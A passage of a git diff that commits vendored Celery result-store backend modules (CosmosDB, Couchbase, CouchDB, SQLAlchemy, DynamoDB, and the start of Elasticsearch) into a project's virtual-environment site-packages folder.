pydocumentdb.retry_options import RetryOptions +except ImportError: + pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \ + HTTPFailure = ConnectionPolicy = RetryOptions = None + +__all__ = ("CosmosDBSQLBackend",) + + +ERROR_NOT_FOUND = 404 +ERROR_EXISTS = 409 + +LOGGER = get_logger(__name__) + + +class CosmosDBSQLBackend(KeyValueStoreBackend): + """CosmosDB/SQL backend for Celery.""" + + def __init__(self, + url=None, + database_name=None, + collection_name=None, + consistency_level=None, + max_retry_attempts=None, + max_retry_wait_time=None, + *args, + **kwargs): + super().__init__(*args, **kwargs) + + if pydocumentdb is None: + raise ImproperlyConfigured( + "You need to install the pydocumentdb library to use the " + "CosmosDB backend.") + + conf = self.app.conf + + self._endpoint, self._key = self._parse_url(url) + + self._database_name = ( + database_name or + conf["cosmosdbsql_database_name"]) + + self._collection_name = ( + collection_name or + conf["cosmosdbsql_collection_name"]) + + try: + self._consistency_level = getattr( + ConsistencyLevel, + consistency_level or + conf["cosmosdbsql_consistency_level"]) + except AttributeError: + raise ImproperlyConfigured("Unknown CosmosDB consistency level") + + self._max_retry_attempts = ( + max_retry_attempts or + conf["cosmosdbsql_max_retry_attempts"]) + + self._max_retry_wait_time = ( + max_retry_wait_time or + conf["cosmosdbsql_max_retry_wait_time"]) + + @classmethod + def _parse_url(cls, url): + _, host, port, _, password, _, _ = _parse_url(url) + + if not host or not password: + raise ImproperlyConfigured("Invalid URL") + + if not port: + port = 443 + + scheme = "https" if port == 443 else "http" + endpoint = f"{scheme}://{host}:{port}" + return endpoint, password + + @cached_property + def _client(self): + """Return the CosmosDB/SQL client. + + If this is the first call to the property, the client is created and + the database and collection are initialized if they don't yet exist. + + """ + connection_policy = ConnectionPolicy() + connection_policy.RetryOptions = RetryOptions( + max_retry_attempt_count=self._max_retry_attempts, + max_wait_time_in_seconds=self._max_retry_wait_time) + + client = DocumentClient( + self._endpoint, + {"masterKey": self._key}, + connection_policy=connection_policy, + consistency_level=self._consistency_level) + + self._create_database_if_not_exists(client) + self._create_collection_if_not_exists(client) + + return client + + def _create_database_if_not_exists(self, client): + try: + client.CreateDatabase({"id": self._database_name}) + except HTTPFailure as ex: + if ex.status_code != ERROR_EXISTS: + raise + else: + LOGGER.info("Created CosmosDB database %s", + self._database_name) + + def _create_collection_if_not_exists(self, client): + try: + client.CreateCollection( + self._database_link, + {"id": self._collection_name, + "partitionKey": {"paths": ["/id"], + "kind": PartitionKind.Hash}}) + except HTTPFailure as ex: + if ex.status_code != ERROR_EXISTS: + raise + else: + LOGGER.info("Created CosmosDB collection %s/%s", + self._database_name, self._collection_name) + + @cached_property + def _database_link(self): + return "dbs/" + self._database_name + + @cached_property + def _collection_link(self): + return self._database_link + "/colls/" + self._collection_name + + def _get_document_link(self, key): + return self._collection_link + "/docs/" + key + + @classmethod + def _get_partition_key(cls, key): + if not key or key.isspace(): + raise ValueError("Key cannot be none, empty or whitespace.") + + return {"partitionKey": key} + + def get(self, key): + """Read the value stored at the given key. + + Args: + key: The key for which to read the value. + + """ + key = bytes_to_str(key) + LOGGER.debug("Getting CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + try: + document = self._client.ReadDocument( + self._get_document_link(key), + self._get_partition_key(key)) + except HTTPFailure as ex: + if ex.status_code != ERROR_NOT_FOUND: + raise + return None + else: + return document.get("value") + + def set(self, key, value): + """Store a value for a given key. + + Args: + key: The key at which to store the value. + value: The value to store. + + """ + key = bytes_to_str(key) + LOGGER.debug("Creating CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + self._client.CreateDocument( + self._collection_link, + {"id": key, "value": value}, + self._get_partition_key(key)) + + def mget(self, keys): + """Read all the values for the provided keys. + + Args: + keys: The list of keys to read. + + """ + return [self.get(key) for key in keys] + + def delete(self, key): + """Delete the value at a given key. + + Args: + key: The key of the value to delete. + + """ + key = bytes_to_str(key) + LOGGER.debug("Deleting CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + self._client.DeleteDocument( + self._get_document_link(key), + self._get_partition_key(key)) diff --git a/env/Lib/site-packages/celery/backends/couchbase.py b/env/Lib/site-packages/celery/backends/couchbase.py new file mode 100644 index 00000000..f01cb958 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/couchbase.py @@ -0,0 +1,114 @@ +"""Couchbase result store backend.""" + +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + from couchbase.auth import PasswordAuthenticator + from couchbase.cluster import Cluster +except ImportError: + Cluster = PasswordAuthenticator = None + +try: + from couchbase_core._libcouchbase import FMT_AUTO +except ImportError: + FMT_AUTO = None + +__all__ = ('CouchbaseBackend',) + + +class CouchbaseBackend(KeyValueStoreBackend): + """Couchbase backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`couchbase` is not available. + """ + + bucket = 'default' + host = 'localhost' + port = 8091 + username = None + password = None + quiet = False + supports_autoexpire = True + + timeout = 2.5 + + # Use str as couchbase key not bytes + key_t = str + + def __init__(self, url=None, *args, **kwargs): + kwargs.setdefault('expires_type', int) + super().__init__(*args, **kwargs) + self.url = url + + if Cluster is None: + raise ImproperlyConfigured( + 'You need to install the couchbase library to use the ' + 'Couchbase backend.', + ) + + uhost = uport = uname = upass = ubucket = None + if url: + _, uhost, uport, uname, upass, ubucket, _ = _parse_url(url) + ubucket = ubucket.strip('/') if ubucket else None + + config = self.app.conf.get('couchbase_backend_settings', None) + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'Couchbase backend settings should be grouped in a dict', + ) + else: + config = {} + + self.host = uhost or config.get('host', self.host) + self.port = int(uport or config.get('port', self.port)) + self.bucket = ubucket or config.get('bucket', self.bucket) + self.username = uname or config.get('username', self.username) + self.password = upass or config.get('password', self.password) + + self._connection = None + + def _get_connection(self): + """Connect to the Couchbase server.""" + if self._connection is None: + if self.host and self.port: + uri = f"couchbase://{self.host}:{self.port}" + else: + uri = f"couchbase://{self.host}" + if self.username and self.password: + opt = PasswordAuthenticator(self.username, self.password) + else: + opt = None + + cluster = Cluster(uri, opt) + + bucket = cluster.bucket(self.bucket) + + self._connection = bucket.default_collection() + return self._connection + + @property + def connection(self): + return self._get_connection() + + def get(self, key): + return self.connection.get(key).content + + def set(self, key, value): + # Since 4.0.0 value is JSONType in couchbase lib, so parameter format isn't needed + if FMT_AUTO is not None: + self.connection.upsert(key, value, ttl=self.expires, format=FMT_AUTO) + else: + self.connection.upsert(key, value, ttl=self.expires) + + def mget(self, keys): + return self.connection.get_multi(keys) + + def delete(self, key): + self.connection.remove(key) diff --git a/env/Lib/site-packages/celery/backends/couchdb.py b/env/Lib/site-packages/celery/backends/couchdb.py new file mode 100644 index 00000000..a4b040da --- /dev/null +++ b/env/Lib/site-packages/celery/backends/couchdb.py @@ -0,0 +1,99 @@ +"""CouchDB result store backend.""" +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import pycouchdb +except ImportError: + pycouchdb = None + +__all__ = ('CouchBackend',) + +ERR_LIB_MISSING = """\ +You need to install the pycouchdb library to use the CouchDB result backend\ +""" + + +class CouchBackend(KeyValueStoreBackend): + """CouchDB backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pycouchdb` is not available. + """ + + container = 'default' + scheme = 'http' + host = 'localhost' + port = 5984 + username = None + password = None + + def __init__(self, url=None, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + + if pycouchdb is None: + raise ImproperlyConfigured(ERR_LIB_MISSING) + + uscheme = uhost = uport = uname = upass = ucontainer = None + if url: + _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) + ucontainer = ucontainer.strip('/') if ucontainer else None + + self.scheme = uscheme or self.scheme + self.host = uhost or self.host + self.port = int(uport or self.port) + self.container = ucontainer or self.container + self.username = uname or self.username + self.password = upass or self.password + + self._connection = None + + def _get_connection(self): + """Connect to the CouchDB server.""" + if self.username and self.password: + conn_string = f'{self.scheme}://{self.username}:{self.password}@{self.host}:{self.port}' + server = pycouchdb.Server(conn_string, authmethod='basic') + else: + conn_string = f'{self.scheme}://{self.host}:{self.port}' + server = pycouchdb.Server(conn_string) + + try: + return server.database(self.container) + except pycouchdb.exceptions.NotFound: + return server.create(self.container) + + @property + def connection(self): + if self._connection is None: + self._connection = self._get_connection() + return self._connection + + def get(self, key): + key = bytes_to_str(key) + try: + return self.connection.get(key)['value'] + except pycouchdb.exceptions.NotFound: + return None + + def set(self, key, value): + key = bytes_to_str(key) + data = {'_id': key, 'value': value} + try: + self.connection.save(data) + except pycouchdb.exceptions.Conflict: + # document already exists, update it + data = self.connection.get(key) + data['value'] = value + self.connection.save(data) + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + self.connection.delete(key) diff --git a/env/Lib/site-packages/celery/backends/database/__init__.py b/env/Lib/site-packages/celery/backends/database/__init__.py new file mode 100644 index 00000000..91080adc --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/__init__.py @@ -0,0 +1,222 @@ +"""SQLAlchemy result store backend.""" +import logging +from contextlib import contextmanager + +from vine.utils import wraps + +from celery import states +from celery.backends.base import BaseBackend +from celery.exceptions import ImproperlyConfigured +from celery.utils.time import maybe_timedelta + +from .models import Task, TaskExtended, TaskSet +from .session import SessionManager + +try: + from sqlalchemy.exc import DatabaseError, InvalidRequestError + from sqlalchemy.orm.exc import StaleDataError +except ImportError: + raise ImproperlyConfigured( + 'The database result backend requires SQLAlchemy to be installed.' + 'See https://pypi.org/project/SQLAlchemy/') + +logger = logging.getLogger(__name__) + +__all__ = ('DatabaseBackend',) + + +@contextmanager +def session_cleanup(session): + try: + yield + except Exception: + session.rollback() + raise + finally: + session.close() + + +def retry(fun): + + @wraps(fun) + def _inner(*args, **kwargs): + max_retries = kwargs.pop('max_retries', 3) + + for retries in range(max_retries): + try: + return fun(*args, **kwargs) + except (DatabaseError, InvalidRequestError, StaleDataError): + logger.warning( + 'Failed operation %s. Retrying %s more times.', + fun.__name__, max_retries - retries - 1, + exc_info=True) + if retries + 1 >= max_retries: + raise + + return _inner + + +class DatabaseBackend(BaseBackend): + """The database result backend.""" + + # ResultSet.iterate should sleep this much between each pool, + # to not bombard the database with queries. + subpolling_interval = 0.5 + + task_cls = Task + taskset_cls = TaskSet + + def __init__(self, dburi=None, engine_options=None, url=None, **kwargs): + # The `url` argument was added later and is used by + # the app to set backend by url (celery.app.backends.by_url) + super().__init__(expires_type=maybe_timedelta, + url=url, **kwargs) + conf = self.app.conf + + if self.extended_result: + self.task_cls = TaskExtended + + self.url = url or dburi or conf.database_url + self.engine_options = dict( + engine_options or {}, + **conf.database_engine_options or {}) + self.short_lived_sessions = kwargs.get( + 'short_lived_sessions', + conf.database_short_lived_sessions) + + schemas = conf.database_table_schemas or {} + tablenames = conf.database_table_names or {} + self.task_cls.configure( + schema=schemas.get('task'), + name=tablenames.get('task')) + self.taskset_cls.configure( + schema=schemas.get('group'), + name=tablenames.get('group')) + + if not self.url: + raise ImproperlyConfigured( + 'Missing connection string! Do you have the' + ' database_url setting set to a real value?') + + @property + def extended_result(self): + return self.app.conf.find_value_for_key('extended', 'result') + + def ResultSession(self, session_manager=SessionManager()): + return session_manager.session_factory( + dburi=self.url, + short_lived_sessions=self.short_lived_sessions, + **self.engine_options) + + @retry + def _store_result(self, task_id, result, state, traceback=None, + request=None, **kwargs): + """Store return value and state of an executed task.""" + session = self.ResultSession() + with session_cleanup(session): + task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) + task = task and task[0] + if not task: + task = self.task_cls(task_id) + task.task_id = task_id + session.add(task) + session.flush() + + self._update_result(task, result, state, traceback=traceback, request=request) + session.commit() + + def _update_result(self, task, result, state, traceback=None, + request=None): + + meta = self._get_result_meta(result=result, state=state, + traceback=traceback, request=request, + format_date=False, encode=True) + + # Exclude the primary key id and task_id columns + # as we should not set it None + columns = [column.name for column in self.task_cls.__table__.columns + if column.name not in {'id', 'task_id'}] + + # Iterate through the columns name of the table + # to set the value from meta. + # If the value is not present in meta, set None + for column in columns: + value = meta.get(column) + setattr(task, column, value) + + @retry + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + session = self.ResultSession() + with session_cleanup(session): + task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) + task = task and task[0] + if not task: + task = self.task_cls(task_id) + task.status = states.PENDING + task.result = None + data = task.to_dict() + if data.get('args', None) is not None: + data['args'] = self.decode(data['args']) + if data.get('kwargs', None) is not None: + data['kwargs'] = self.decode(data['kwargs']) + return self.meta_from_decoded(data) + + @retry + def _save_group(self, group_id, result): + """Store the result of an executed group.""" + session = self.ResultSession() + with session_cleanup(session): + group = self.taskset_cls(group_id, result) + session.add(group) + session.flush() + session.commit() + return result + + @retry + def _restore_group(self, group_id): + """Get meta-data for group by id.""" + session = self.ResultSession() + with session_cleanup(session): + group = session.query(self.taskset_cls).filter( + self.taskset_cls.taskset_id == group_id).first() + if group: + return group.to_dict() + + @retry + def _delete_group(self, group_id): + """Delete meta-data for group by id.""" + session = self.ResultSession() + with session_cleanup(session): + session.query(self.taskset_cls).filter( + self.taskset_cls.taskset_id == group_id).delete() + session.flush() + session.commit() + + @retry + def _forget(self, task_id): + """Forget about result.""" + session = self.ResultSession() + with session_cleanup(session): + session.query(self.task_cls).filter(self.task_cls.task_id == task_id).delete() + session.commit() + + def cleanup(self): + """Delete expired meta-data.""" + session = self.ResultSession() + expires = self.expires + now = self.app.now() + with session_cleanup(session): + session.query(self.task_cls).filter( + self.task_cls.date_done < (now - expires)).delete() + session.query(self.taskset_cls).filter( + self.taskset_cls.date_done < (now - expires)).delete() + session.commit() + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + kwargs.update( + {'dburi': self.url, + 'expires': self.expires, + 'engine_options': self.engine_options}) + return super().__reduce__(args, kwargs) diff --git a/env/Lib/site-packages/celery/backends/database/models.py b/env/Lib/site-packages/celery/backends/database/models.py new file mode 100644 index 00000000..1c766b51 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/models.py @@ -0,0 +1,108 @@ +"""Database models used by the SQLAlchemy result store backend.""" +from datetime import datetime + +import sqlalchemy as sa +from sqlalchemy.types import PickleType + +from celery import states + +from .session import ResultModelBase + +__all__ = ('Task', 'TaskExtended', 'TaskSet') + + +class Task(ResultModelBase): + """Task result/status.""" + + __tablename__ = 'celery_taskmeta' + __table_args__ = {'sqlite_autoincrement': True} + + id = sa.Column(sa.Integer, sa.Sequence('task_id_sequence'), + primary_key=True, autoincrement=True) + task_id = sa.Column(sa.String(155), unique=True) + status = sa.Column(sa.String(50), default=states.PENDING) + result = sa.Column(PickleType, nullable=True) + date_done = sa.Column(sa.DateTime, default=datetime.utcnow, + onupdate=datetime.utcnow, nullable=True) + traceback = sa.Column(sa.Text, nullable=True) + + def __init__(self, task_id): + self.task_id = task_id + + def to_dict(self): + return { + 'task_id': self.task_id, + 'status': self.status, + 'result': self.result, + 'traceback': self.traceback, + 'date_done': self.date_done, + } + + def __repr__(self): + return ''.format(self) + + @classmethod + def configure(cls, schema=None, name=None): + cls.__table__.schema = schema + cls.id.default.schema = schema + cls.__table__.name = name or cls.__tablename__ + + +class TaskExtended(Task): + """For the extend result.""" + + __tablename__ = 'celery_taskmeta' + __table_args__ = {'sqlite_autoincrement': True, 'extend_existing': True} + + name = sa.Column(sa.String(155), nullable=True) + args = sa.Column(sa.LargeBinary, nullable=True) + kwargs = sa.Column(sa.LargeBinary, nullable=True) + worker = sa.Column(sa.String(155), nullable=True) + retries = sa.Column(sa.Integer, nullable=True) + queue = sa.Column(sa.String(155), nullable=True) + + def to_dict(self): + task_dict = super().to_dict() + task_dict.update({ + 'name': self.name, + 'args': self.args, + 'kwargs': self.kwargs, + 'worker': self.worker, + 'retries': self.retries, + 'queue': self.queue, + }) + return task_dict + + +class TaskSet(ResultModelBase): + """TaskSet result.""" + + __tablename__ = 'celery_tasksetmeta' + __table_args__ = {'sqlite_autoincrement': True} + + id = sa.Column(sa.Integer, sa.Sequence('taskset_id_sequence'), + autoincrement=True, primary_key=True) + taskset_id = sa.Column(sa.String(155), unique=True) + result = sa.Column(PickleType, nullable=True) + date_done = sa.Column(sa.DateTime, default=datetime.utcnow, + nullable=True) + + def __init__(self, taskset_id, result): + self.taskset_id = taskset_id + self.result = result + + def to_dict(self): + return { + 'taskset_id': self.taskset_id, + 'result': self.result, + 'date_done': self.date_done, + } + + def __repr__(self): + return f'' + + @classmethod + def configure(cls, schema=None, name=None): + cls.__table__.schema = schema + cls.id.default.schema = schema + cls.__table__.name = name or cls.__tablename__ diff --git a/env/Lib/site-packages/celery/backends/database/session.py b/env/Lib/site-packages/celery/backends/database/session.py new file mode 100644 index 00000000..415d4623 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/session.py @@ -0,0 +1,89 @@ +"""SQLAlchemy session.""" +import time + +from kombu.utils.compat import register_after_fork +from sqlalchemy import create_engine +from sqlalchemy.exc import DatabaseError +from sqlalchemy.orm import sessionmaker +from sqlalchemy.pool import NullPool + +from celery.utils.time import get_exponential_backoff_interval + +try: + from sqlalchemy.orm import declarative_base +except ImportError: + # TODO: Remove this once we drop support for SQLAlchemy < 1.4. + from sqlalchemy.ext.declarative import declarative_base + +ResultModelBase = declarative_base() + +__all__ = ('SessionManager',) + +PREPARE_MODELS_MAX_RETRIES = 10 + + +def _after_fork_cleanup_session(session): + session._after_fork() + + +class SessionManager: + """Manage SQLAlchemy sessions.""" + + def __init__(self): + self._engines = {} + self._sessions = {} + self.forked = False + self.prepared = False + if register_after_fork is not None: + register_after_fork(self, _after_fork_cleanup_session) + + def _after_fork(self): + self.forked = True + + def get_engine(self, dburi, **kwargs): + if self.forked: + try: + return self._engines[dburi] + except KeyError: + engine = self._engines[dburi] = create_engine(dburi, **kwargs) + return engine + else: + kwargs = {k: v for k, v in kwargs.items() if + not k.startswith('pool')} + return create_engine(dburi, poolclass=NullPool, **kwargs) + + def create_session(self, dburi, short_lived_sessions=False, **kwargs): + engine = self.get_engine(dburi, **kwargs) + if self.forked: + if short_lived_sessions or dburi not in self._sessions: + self._sessions[dburi] = sessionmaker(bind=engine) + return engine, self._sessions[dburi] + return engine, sessionmaker(bind=engine) + + def prepare_models(self, engine): + if not self.prepared: + # SQLAlchemy will check if the items exist before trying to + # create them, which is a race condition. If it raises an error + # in one iteration, the next may pass all the existence checks + # and the call will succeed. + retries = 0 + while True: + try: + ResultModelBase.metadata.create_all(engine) + except DatabaseError: + if retries < PREPARE_MODELS_MAX_RETRIES: + sleep_amount_ms = get_exponential_backoff_interval( + 10, retries, 1000, True + ) + time.sleep(sleep_amount_ms / 1000) + retries += 1 + else: + raise + else: + break + self.prepared = True + + def session_factory(self, dburi, **kwargs): + engine, session = self.create_session(dburi, **kwargs) + self.prepare_models(engine) + return session() diff --git a/env/Lib/site-packages/celery/backends/dynamodb.py b/env/Lib/site-packages/celery/backends/dynamodb.py new file mode 100644 index 00000000..90fbae09 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/dynamodb.py @@ -0,0 +1,493 @@ +"""AWS DynamoDB result store backend.""" +from collections import namedtuple +from time import sleep, time + +from kombu.utils.url import _parse_url as parse_url + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import boto3 + from botocore.exceptions import ClientError +except ImportError: + boto3 = ClientError = None + +__all__ = ('DynamoDBBackend',) + + +# Helper class that describes a DynamoDB attribute +DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type')) + +logger = get_logger(__name__) + + +class DynamoDBBackend(KeyValueStoreBackend): + """AWS DynamoDB result backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`boto3` is not available. + """ + + #: default DynamoDB table name (`default`) + table_name = 'celery' + + #: Read Provisioned Throughput (`default`) + read_capacity_units = 1 + + #: Write Provisioned Throughput (`default`) + write_capacity_units = 1 + + #: AWS region (`default`) + aws_region = None + + #: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`) + endpoint_url = None + + #: Item time-to-live in seconds (`default`) + time_to_live_seconds = None + + # DynamoDB supports Time to Live as an auto-expiry mechanism. + supports_autoexpire = True + + _key_field = DynamoDBAttribute(name='id', data_type='S') + _value_field = DynamoDBAttribute(name='result', data_type='B') + _timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N') + _ttl_field = DynamoDBAttribute(name='ttl', data_type='N') + _available_fields = None + + def __init__(self, url=None, table_name=None, *args, **kwargs): + super().__init__(*args, **kwargs) + + self.url = url + self.table_name = table_name or self.table_name + + if not boto3: + raise ImproperlyConfigured( + 'You need to install the boto3 library to use the ' + 'DynamoDB backend.') + + aws_credentials_given = False + aws_access_key_id = None + aws_secret_access_key = None + + if url is not None: + scheme, region, port, username, password, table, query = \ + parse_url(url) + + aws_access_key_id = username + aws_secret_access_key = password + + access_key_given = aws_access_key_id is not None + secret_key_given = aws_secret_access_key is not None + + if access_key_given != secret_key_given: + raise ImproperlyConfigured( + 'You need to specify both the Access Key ID ' + 'and Secret.') + + aws_credentials_given = access_key_given + + if region == 'localhost': + # We are using the downloadable, local version of DynamoDB + self.endpoint_url = f'http://localhost:{port}' + self.aws_region = 'us-east-1' + logger.warning( + 'Using local-only DynamoDB endpoint URL: {}'.format( + self.endpoint_url + ) + ) + else: + self.aws_region = region + + # If endpoint_url is explicitly set use it instead + _get = self.app.conf.get + config_endpoint_url = _get('dynamodb_endpoint_url') + if config_endpoint_url: + self.endpoint_url = config_endpoint_url + + self.read_capacity_units = int( + query.get( + 'read', + self.read_capacity_units + ) + ) + self.write_capacity_units = int( + query.get( + 'write', + self.write_capacity_units + ) + ) + + ttl = query.get('ttl_seconds', self.time_to_live_seconds) + if ttl: + try: + self.time_to_live_seconds = int(ttl) + except ValueError as e: + logger.error( + f'TTL must be a number; got "{ttl}"', + exc_info=e + ) + raise e + + self.table_name = table or self.table_name + + self._available_fields = ( + self._key_field, + self._value_field, + self._timestamp_field + ) + + self._client = None + if aws_credentials_given: + self._get_client( + access_key_id=aws_access_key_id, + secret_access_key=aws_secret_access_key + ) + + def _get_client(self, access_key_id=None, secret_access_key=None): + """Get client connection.""" + if self._client is None: + client_parameters = { + 'region_name': self.aws_region + } + if access_key_id is not None: + client_parameters.update({ + 'aws_access_key_id': access_key_id, + 'aws_secret_access_key': secret_access_key + }) + + if self.endpoint_url is not None: + client_parameters['endpoint_url'] = self.endpoint_url + + self._client = boto3.client( + 'dynamodb', + **client_parameters + ) + self._get_or_create_table() + + if self._has_ttl() is not None: + self._validate_ttl_methods() + self._set_table_ttl() + + return self._client + + def _get_table_schema(self): + """Get the boto3 structure describing the DynamoDB table schema.""" + return { + 'AttributeDefinitions': [ + { + 'AttributeName': self._key_field.name, + 'AttributeType': self._key_field.data_type + } + ], + 'TableName': self.table_name, + 'KeySchema': [ + { + 'AttributeName': self._key_field.name, + 'KeyType': 'HASH' + } + ], + 'ProvisionedThroughput': { + 'ReadCapacityUnits': self.read_capacity_units, + 'WriteCapacityUnits': self.write_capacity_units + } + } + + def _get_or_create_table(self): + """Create table if not exists, otherwise return the description.""" + table_schema = self._get_table_schema() + try: + return self._client.describe_table(TableName=self.table_name) + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + + if error_code == 'ResourceNotFoundException': + table_description = self._client.create_table(**table_schema) + logger.info( + 'DynamoDB Table {} did not exist, creating.'.format( + self.table_name + ) + ) + # In case we created the table, wait until it becomes available. + self._wait_for_table_status('ACTIVE') + logger.info( + 'DynamoDB Table {} is now available.'.format( + self.table_name + ) + ) + return table_description + else: + raise e + + def _has_ttl(self): + """Return the desired Time to Live config. + + - True: Enable TTL on the table; use expiry. + - False: Disable TTL on the table; don't use expiry. + - None: Ignore TTL on the table; don't use expiry. + """ + return None if self.time_to_live_seconds is None \ + else self.time_to_live_seconds >= 0 + + def _validate_ttl_methods(self): + """Verify boto support for the DynamoDB Time to Live methods.""" + # Required TTL methods. + required_methods = ( + 'update_time_to_live', + 'describe_time_to_live', + ) + + # Find missing methods. + missing_methods = [] + for method in list(required_methods): + if not hasattr(self._client, method): + missing_methods.append(method) + + if missing_methods: + logger.error( + ( + 'boto3 method(s) {methods} not found; ensure that ' + 'boto3>=1.9.178 and botocore>=1.12.178 are installed' + ).format( + methods=','.join(missing_methods) + ) + ) + raise AttributeError( + 'boto3 method(s) {methods} not found'.format( + methods=','.join(missing_methods) + ) + ) + + def _get_ttl_specification(self, ttl_attr_name): + """Get the boto3 structure describing the DynamoDB TTL specification.""" + return { + 'TableName': self.table_name, + 'TimeToLiveSpecification': { + 'Enabled': self._has_ttl(), + 'AttributeName': ttl_attr_name + } + } + + def _get_table_ttl_description(self): + # Get the current TTL description. + try: + description = self._client.describe_time_to_live( + TableName=self.table_name + ) + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + error_message = e.response['Error'].get('Message', 'Unknown') + logger.error(( + 'Error describing Time to Live on DynamoDB table {table}: ' + '{code}: {message}' + ).format( + table=self.table_name, + code=error_code, + message=error_message, + )) + raise e + + return description + + def _set_table_ttl(self): + """Enable or disable Time to Live on the table.""" + # Get the table TTL description, and return early when possible. + description = self._get_table_ttl_description() + status = description['TimeToLiveDescription']['TimeToLiveStatus'] + if status in ('ENABLED', 'ENABLING'): + cur_attr_name = \ + description['TimeToLiveDescription']['AttributeName'] + if self._has_ttl(): + if cur_attr_name == self._ttl_field.name: + # We want TTL enabled, and it is currently enabled or being + # enabled, and on the correct attribute. + logger.debug(( + 'DynamoDB Time to Live is {situation} ' + 'on table {table}' + ).format( + situation='already enabled' + if status == 'ENABLED' + else 'currently being enabled', + table=self.table_name + )) + return description + + elif status in ('DISABLED', 'DISABLING'): + if not self._has_ttl(): + # We want TTL disabled, and it is currently disabled or being + # disabled. + logger.debug(( + 'DynamoDB Time to Live is {situation} ' + 'on table {table}' + ).format( + situation='already disabled' + if status == 'DISABLED' + else 'currently being disabled', + table=self.table_name + )) + return description + + # The state shouldn't ever have any value beyond the four handled + # above, but to ease troubleshooting of potential future changes, emit + # a log showing the unknown state. + else: # pragma: no cover + logger.warning(( + 'Unknown DynamoDB Time to Live status {status} ' + 'on table {table}. Attempting to continue.' + ).format( + status=status, + table=self.table_name + )) + + # At this point, we have one of the following situations: + # + # We want TTL enabled, + # + # - and it's currently disabled: Try to enable. + # + # - and it's being disabled: Try to enable, but this is almost sure to + # raise ValidationException with message: + # + # Time to live has been modified multiple times within a fixed + # interval + # + # - and it's currently enabling or being enabled, but on the wrong + # attribute: Try to enable, but this will raise ValidationException + # with message: + # + # TimeToLive is active on a different AttributeName: current + # AttributeName is ttlx + # + # We want TTL disabled, + # + # - and it's currently enabled: Try to disable. + # + # - and it's being enabled: Try to disable, but this is almost sure to + # raise ValidationException with message: + # + # Time to live has been modified multiple times within a fixed + # interval + # + attr_name = \ + cur_attr_name if status == 'ENABLED' else self._ttl_field.name + try: + specification = self._client.update_time_to_live( + **self._get_ttl_specification( + ttl_attr_name=attr_name + ) + ) + logger.info( + ( + 'DynamoDB table Time to Live updated: ' + 'table={table} enabled={enabled} attribute={attr}' + ).format( + table=self.table_name, + enabled=self._has_ttl(), + attr=self._ttl_field.name + ) + ) + return specification + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + error_message = e.response['Error'].get('Message', 'Unknown') + logger.error(( + 'Error {action} Time to Live on DynamoDB table {table}: ' + '{code}: {message}' + ).format( + action='enabling' if self._has_ttl() else 'disabling', + table=self.table_name, + code=error_code, + message=error_message, + )) + raise e + + def _wait_for_table_status(self, expected='ACTIVE'): + """Poll for the expected table status.""" + achieved_state = False + while not achieved_state: + table_description = self.client.describe_table( + TableName=self.table_name + ) + logger.debug( + 'Waiting for DynamoDB table {} to become {}.'.format( + self.table_name, + expected + ) + ) + current_status = table_description['Table']['TableStatus'] + achieved_state = current_status == expected + sleep(1) + + def _prepare_get_request(self, key): + """Construct the item retrieval request parameters.""" + return { + 'TableName': self.table_name, + 'Key': { + self._key_field.name: { + self._key_field.data_type: key + } + } + } + + def _prepare_put_request(self, key, value): + """Construct the item creation request parameters.""" + timestamp = time() + put_request = { + 'TableName': self.table_name, + 'Item': { + self._key_field.name: { + self._key_field.data_type: key + }, + self._value_field.name: { + self._value_field.data_type: value + }, + self._timestamp_field.name: { + self._timestamp_field.data_type: str(timestamp) + } + } + } + if self._has_ttl(): + put_request['Item'].update({ + self._ttl_field.name: { + self._ttl_field.data_type: + str(int(timestamp + self.time_to_live_seconds)) + } + }) + return put_request + + def _item_to_dict(self, raw_response): + """Convert get_item() response to field-value pairs.""" + if 'Item' not in raw_response: + return {} + return { + field.name: raw_response['Item'][field.name][field.data_type] + for field in self._available_fields + } + + @property + def client(self): + return self._get_client() + + def get(self, key): + key = str(key) + request_parameters = self._prepare_get_request(key) + item_response = self.client.get_item(**request_parameters) + item = self._item_to_dict(item_response) + return item.get(self._value_field.name) + + def set(self, key, value): + key = str(key) + request_parameters = self._prepare_put_request(key, value) + self.client.put_item(**request_parameters) + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + key = str(key) + request_parameters = self._prepare_get_request(key) + self.client.delete_item(**request_parameters) diff --git a/env/Lib/site-packages/celery/backends/elasticsearch.py b/env/Lib/site-packages/celery/backends/elasticsearch.py new file mode 100644 index 00000000..54481297 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/elasticsearch.py @@ -0,0 +1,248 @@ +"""Elasticsearch result store backend.""" +from datetime import datetime + +from kombu.utils.encoding import bytes_to_str +from 